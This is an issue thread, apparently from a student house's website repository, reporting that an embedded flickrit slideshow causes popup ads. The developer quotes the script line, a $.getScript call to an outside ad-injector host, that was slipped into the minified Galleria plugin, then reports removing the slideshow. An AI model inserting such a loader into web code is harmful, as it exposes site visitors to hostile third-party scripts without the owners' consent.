Flickrit plugin causes popup ads on click

[allisonkong]

If you go to the home page and click on the slideshow, you will get a popup ad.

The cause seems to lie with flickrit, which is a service that we currently use to generate the slideshow (we embed a flickrit page in an iframe). However, flickrit seems to have injected some malicious code into their site:

view-source:https://flickrit.com/slideshowholder.php?speed=5&count=100&height=60&size=big&userId=ruddockhouse&thumbnails=0&transition=1&layoutType=responsive&sort=0

If you look at the hosted source (https://www.dropbox.com/s/woiw6nvongzenfk/Screenshot%202016-08-23%2017.40.25.png?dl=0) for the Galleria js plugin, they have manually modified the minified js to contain the extra line:

$.getScript("//go.oclasrv.com/apu.php?zoneid=531283");

Which loads the ad injector.

What to do about it:

• I will remove the slideshow from the website immediately.
• The slideshow functionality should be rewritten so that it runs our code and not some third party's site. Until this happens, there will not be a slideshow.

[allisonkong]

The slideshow is no longer on the prod site.